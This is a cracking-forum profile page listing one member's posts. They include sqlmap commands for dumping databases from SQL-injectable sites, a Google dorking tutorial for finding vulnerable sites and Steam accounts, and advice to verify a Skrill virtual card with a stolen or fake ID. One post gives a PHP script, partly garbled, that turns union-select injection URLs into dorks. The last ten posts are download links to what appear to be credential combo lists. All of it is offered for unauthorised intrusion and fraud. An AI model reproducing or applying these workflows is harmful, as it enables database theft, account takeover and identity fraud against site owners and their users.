cake

Members
  • Content Count

    19
  • Joined

  • Last visited

Community Reputation

133 Excellent

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Hello Guys , I am back with another thread . Well , as by title , you have already understand what it is going to be today. Well , this is my personal method and I would love to share it here. So ? ENJOY ? and DON'T LEECH. [hide]How to dump databases 10x faster than SQLi Dumper Step 1: After going through the whole SQLi Dumper process, find your injectable URL and hold on to it, these are usually found in the "Injectables" tab. Step 2: Install sqlmap on your preferred operating system, (this requires python). Step 3: Once installed launch sqlmap from here on out we will refer to this as just "sqlmap" (If installed with apt "sqlmap", if being launched via directory "sqlmap.py" or "python sqlmap.py") Step 4: Once you have sqlmap open enter the following into the terminal [sqlmap -u "URL"] include the quotations around the URL. Answer the questions to your preference. Step 5: Scanning is done! Time to dump! (List databases): sqlmap -u "URL" --dbs (List tables): sqlmap -u "URL" -D "DATABASE" --tables (List columns): sqlmap -u "URL" -D "DATABASE" -T "TABLE" --columns (Initialize dump): sqlmap -u "URL" -D "DATABASE" -T "TABLE" -C "column1, column2, column3" --dump --eta Once it's done dumping it will notify you of the saved location for the database If you need any help, feel free to contact me .[/hide]
  2. Here is kind of a tutorial on how to write google dorks. With these dorks you get tons of GOOGLE HQ URLS! Vulnerable sites roll down easy with this tutorial. Don't waste time if you don't know what dorks are and how they work. Don't waste time if you don't have any experience with cracking. [hide]Okay, so if you are reading this I'm assuming you already know what are dorks and how they work. The dorks we are going to write programmers, web designers and other crackers call "GOOGLE DORKS", other people call them Complex or Deluxe dorks. Basically google dorks are dorks that abuse the power of google to get websites. Google dorks (Complex/deluxe dorks) are a bit different than the regular dorks we all know. Here is a regular dork: nulled.php?site= Here are a few examples of google dorks: Inurl: "nulled" + ".to" allinurl: "nulled" + "kostrikov" related: "cracking" + "nulled" inurl: index.php?site= intext: "games" + site:com There is no easy way of making these than writing them. I recommend using Notepad++ to write them on. Download notepad++ : https://notepad-plus-plus.org/download/ First of all you need to know what you are looking for. Google dorks are a bit precise so you need to have a clear target. Let's say steam accounts. So now keywords. You don't use random bullshit that get to your mind, or use online keyword scrappers. You need to go on the site that mostly has what you are looking for (atm we will be writing dorks for steam so we will go on steampowered.com, steamcommunity.com, store.steamcommunity.com, some games on steam e.t.c.) You need to look around for some keywords in the URLs when you click around and also you need to look for some common keywords around the site. Write them down or something. Now let's start writing the dorks. Open up Notepad++ and start writing them. I won't go into detail on how to use the keyboard and shit (if u dont know that just shut down ur pc). Here are the commands u need: Inurl: Google will restrict the results to documents containing that word in the url. For instance, inurl: steamcommunity will return documents that mention the word “steamcommunity” in their url, anywhere in the document (url or no). Note there can be no space between if you put more words. (You can use + and "" to put more words, but if u need more just use allinurl) [align=center] allinurl: Same as inurl but here you can write more words, eg. allinurl: "steampowered" + ".com" .[/align] allintitle: Here you tell google to look for the word provided in the title. allintitle: steam site: Google will look for URLS containing specific site, eg. site:com --> will look only for sites containing .com related: Google will look for URLs related to the keyword you put in, eg. related: steam ---> will look for urls related to steam Here are some dorks I wrote for this tutorial: Inurl: steampowered allinurl: "steam" + "call of duty" index.php?game= intext: "wrong password" e.t.c.[/hide]
  3. Hey, i have trying a lot to get vcc, now i have it and works any site [hide] DO THIS ON SKRILL NEW DESIGN, OLD VERSION SEND U A PHYSICAL CARD 1 - Register on skrill.com / 2 - Verify your skrill with your data ( if u cant, get/buy/stole ID or smth u can do it with that) With this u are able to receive unlimited $$ in your skrill account, fuck paypal 3 - Go to "Skrill Card" 4 - redeem your virtual credit card u can link this to your paypal and pay with the card Done, this vcc works any place, if u use it for some ilegal shit maybe this isnt for u (maybe with fake id yes, i saw someone selling that here), but if u want it to verify paypal, register on sites this will be helpful i guess.[/hide]
  4. Hello everyone ! I present you today a small tutorial, it is a process which will allow you to obtain dorks which will be better quality than what you could find on the web. PLEASE DONT LEECH THIS = REPORT [hide]Hello everyone ! I present you today a small tutorial on the parsing, it is a process which will allow you to obtain dorks which will be better quality than what you could find on the web. You will need an alwaysdata (its FREE ) In this tutorial we are gonna use the parsing. Parsing is a process aimed at working the text, delineating in each line the characters that will be kept / removed. So the parser is a PHP script, which will allow you to parse the injectable links found in SQLi Dumper. Before : http://awebsite/index.php?type=999999.9' union all select 1,[t],3,4,5,6,7,8,9,10 and '0'='0 After : index.php?type= THE PARSER :$lineContent) { $arr = parse_url[$lineContent]; $lol = explode(" [t]",substr($arr["path"],1)."?".$arr["query"]); $lol2 = explode('=',$lol[0]); echo $lol2[0]."="."\n"; } ?> Save it as script.php, and upload it to your alwaysdata (in the www folder of course) Create the dork.txt file with the list of your injectable sites that you want to parse. Both files have to be in the same folder. Like this : https://prnt.sc/be9ryn Once this is done, go to yourname.alwaysdata.net/yourfolder/script.php to view the dorks, CTRL + U for the source code for better visibility. INFORMATIONS : 1.Check the encoding of your files (otherwise error? =) Go all in UTF8 2.Verify the permissions in FileZilla -> Right click on the file, Permission with code 777. [/hide]
  5. [hide]https://mega.nz/#!9ahHVDpA!X9YG56QjX7b0lg0U0qhh2jEqIJwfJYY53yDsMUeG_ZA[/hide]
  6. hit like or report as leecher = ban [hide]https://mega.nz/#!CbgCgCIC!unYx7Iyy3bLpDDw3PoMMiwo_CdufFpRFjcx3gMmHgmg[/hide]
  7. [hide]https://www.upload.ee/files/9025665/Part4.txt.html[/hide]
  8. [hide]https://anonfile.com/Y5i4weiab8/100K_txt[/hide]
  9. [hide]https://anonfile.com/scv84ei4b4/Good_txt[/hide]
  10. [hide]https://anonfile.com/qe96Icgcbe/930k_txt[/hide]
  11. [hide]https://anonfile.com/u2Dd31icbb/Dont_leech_txt[/hide]
  12. [hide]http://www.mediafire.com/file/eserr6bknwyug2r/575k+HQ+Combo.txt[/hide]
  13. [hide]https://anonfile.com/K1o443i9be/540K_Mixed_Combo_1_txt[/hide]
  14. [hide]https://www.sendspace.com/file/yrbpfq[/hide]